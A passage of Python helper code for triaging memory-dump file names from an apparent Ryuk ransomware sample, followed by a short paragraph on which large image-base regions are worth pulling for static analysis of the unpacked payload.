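def parse_dump_name(name):
    """Decode a dump file name into pid, seq, kind, start, end and size."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    start = int(m.group("start"), 16)
    end = int(m.group("end"), 16) if m.group("end") else None
    return {
        "pid": int(m.group("pid")),
        "seq": int(m.group("seq")),
        "kind": "region" if end is not None else "mapping",
        "start": start,
        "end": end,
        "size": (end - start) if end is not None else None,
    }


def format_size(nbytes):
    """Render a byte count the way the report does (KB/MB as 1024-based units)."""
    if nbytes >= 1024 * 1024:
        return f"{nbytes / (1024 * 1024):.1f}MB"
    return f"{nbytes // 1024}KB"


def check_stated_sizes(entries):
    """Names whose stated Filesize disagrees with the size implied by the range."""
    mismatches = []
    for name, stated in entries:
        info = parse_dump_name(name)
        if info["kind"] == "region" and stated is not None:
            if format_size(info["size"]) != stated:
                mismatches.append(name)
    return mismatches


def regions_by_pid(entries):
    """Region dumps grouped per PID as sorted (start, end) tuples."""
    grouped = defaultdict(list)
    for name, _ in entries:
        info = parse_dump_name(name)
        if info["kind"] == "region":
            grouped[info["pid"]].append((info["start"], info["end"]))
    return {pid: sorted(regions) for pid, regions in grouped.items()}


def image_base_regions(entries, image_base=0x400000):
    """PIDs with a dumped region starting at the classic 32-bit PE image base.

    A large region at 0x400000 is where an unpacked or hollowed payload sits
    in a 32-bit process; this is an interpretation to confirm in the dump,
    not something the file name alone proves.
    """
    return sorted(pid for pid, regions in regions_by_pid(entries).items()
                  if any(start == image_base for start, _ in regions))


if __name__ == "__main__":
    print("size mismatches:", check_stated_sizes(SAMPLE_DUMPS))
    for pid, regions in sorted(regions_by_pid(SAMPLE_DUMPS).items()):
        print(pid, [(hex(s), hex(e), format_size(e - s)) for s, e in regions])
    print("image-base regions in PIDs:", image_base_regions(SAMPLE_DUMPS))
```

The region dumps are the ones worth pulling for static analysis: PID 3976's 51.3MB and PID 1804's 106.6MB regions at 0x400000 are far larger than the sample on disk and are the natural place to look for the unpacked Ryuk payload, while the 0x7FF6... region in PID 2436 is a 64-bit image and belongs to a different process altogether.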